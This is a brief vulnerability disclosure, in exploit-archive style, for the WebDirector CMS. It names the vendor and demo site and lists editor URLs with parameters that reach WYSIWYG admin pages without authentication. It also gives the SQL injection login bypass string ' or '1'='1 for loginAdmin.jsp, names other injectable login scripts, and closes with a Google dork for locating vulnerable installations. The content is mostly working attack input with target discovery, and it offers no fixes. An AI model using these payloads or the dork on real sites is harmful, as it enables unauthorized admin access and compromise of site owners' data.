WEBDIRECTOR SQL & Admin ByPass Vulnerabilities


WebDirector is a dynamic, self managed website solution with everything your business needs. (CMS)


Vendor: http://www.corporateinteractive.com.au/
Demo: http://demo.webdirector.net.au/

Credit: DoZ

1. WYSIWIG Editor Admin ByPass

(WYSIWIG Editor) Pages Not Admin Protect

jsp/FCK/editor.jsp?colNum=#&id=#&module=SOMETHING&formName=updateForm.jsp&colName=ATTRLONG_Template_PageHeader&tableType=Elements
jsp/FCK/editor.jsp?colNum=#&id=#&module=SOMETHING&formName=updateForm.jsp&colName=ATTRLONG_Template_PageFooter&tableType=Elements

Change "#" to Number
Change "SOMETHING" to correct category

2. Admin SQL: loginAdmin.jsp

Admin: 1' or '1'='1
Pass: 1' or '1'='1    


3. Standard Business Edition SQL

/client/SecureLogonModule_V2.00/c_secureLogin.jsp



Date: Discovered October 2011

Researchers Note: WebDirector Iphone Edition is Prone to SQl attack also. There are also scripts such as
/SBE/client/TimeSheet/c_tslogin.jsp that suffer from SQL Injection and more bugs may still be undiscovered.
Vendor has been contacted and is working on issue.

Google Dork Iphone Ver: ext:jsp inurl:(c_secureLogin)